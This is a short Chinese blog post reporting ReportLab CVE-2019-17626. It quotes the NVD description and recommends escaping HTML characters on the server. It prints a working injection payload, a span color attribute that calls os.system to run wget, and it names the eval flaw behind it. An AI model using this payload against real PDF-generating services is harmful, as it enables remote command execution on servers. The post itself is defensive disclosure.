reportlab 安全漏洞cve-2019-17626,导致可以执行任意命令

最近我们下载pdf的接口出现了个安全漏洞。

由于color.js 允许了远程执行代码导致了可以在页面标签的color属性添加命令执行。如:
<span color=\"__import__('os').system('wget www.baidu.com')\">test111</span>
服务器端就会去执行命令 访问百度。

ReportLab through 3.5.26 allows remote code execution because of toColor(eval(arg)) in colors.py, as demonstrated by a crafted XML document with '<span color="' followed by arbitrary Python code.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17626
https://nvd.nist.gov/vuln/detail/CVE-2019-17626

但是最新版本仍然没有解决该问题,我们需要后台转义一下html特殊字符。

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容